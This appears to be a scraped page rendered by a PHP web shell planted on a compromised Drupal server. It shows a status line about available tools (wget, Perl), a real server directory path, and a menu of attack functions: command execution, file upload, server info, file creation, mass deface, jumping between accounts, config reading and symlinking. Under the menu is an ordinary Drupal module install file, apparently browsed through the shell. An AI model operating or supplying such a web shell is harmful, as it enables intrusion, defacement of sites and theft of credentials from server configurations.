OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/html/hpsc/../hpsclab/js/../../hpsc/css/../../antarctic-drupal-7.89/sites/all/modules/missing_module/../location/database/../ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
<?php /** * @file * Install, update and uninstall functions for the location_user module. */ /** * Implentation of hook_uninstall(). */ function location_user_uninstall() { // Delete user settings. variable_del('location_settings_user'); }